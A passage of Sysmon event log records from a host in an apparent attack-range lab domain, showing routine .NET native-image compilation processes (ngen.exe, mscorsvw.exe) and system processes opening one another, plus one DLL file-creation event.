(x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9125,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.060\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-0010D7201000}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.060","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-0010D7201000}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9126,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.060\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-0010D7201000}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.060","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-0010D7201000}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9127,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.076\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C8-5F25-0000-001085C61100}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.076","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C8-5F25-0000-001085C61100}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9128,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.107\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C8-5F25-0000-001077C91100}\r\nTargetProcessId: 3128\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.107","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C8-5F25-0000-001077C91100}","TargetProcessId":"3128","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9129,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.107\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C8-5F25-0000-001077C91100}\r\nTargetProcessId: 3128\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.107","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C8-5F25-0000-001077C91100}","TargetProcessId":"3128","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9130,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.122\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C8-5F25-0000-001077C91100}\r\nTargetProcessId: 3128\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.122","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C8-5F25-0000-001077C91100}","TargetProcessId":"3128","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9131,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:36.201\r\nProcessGuid: {E2A3D6B1-13C8-5F25-0000-001077C91100}\r\nProcessId: 3128\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\c38-0\\CustomMarshalers.dll\r\nCreationUtcTime: 2020-08-01 07:03:36.201","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:36.201","ProcessGuid":"{E2A3D6B1-13C8-5F25-0000-001077C91100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\c38-0\\CustomMarshalers.dll","CreationUtcTime":"2020-08-01 07:03:36.201","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9132,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.232\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C8-5F25-0000-0010BECC1100}\r\nTargetProcessId: 3616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 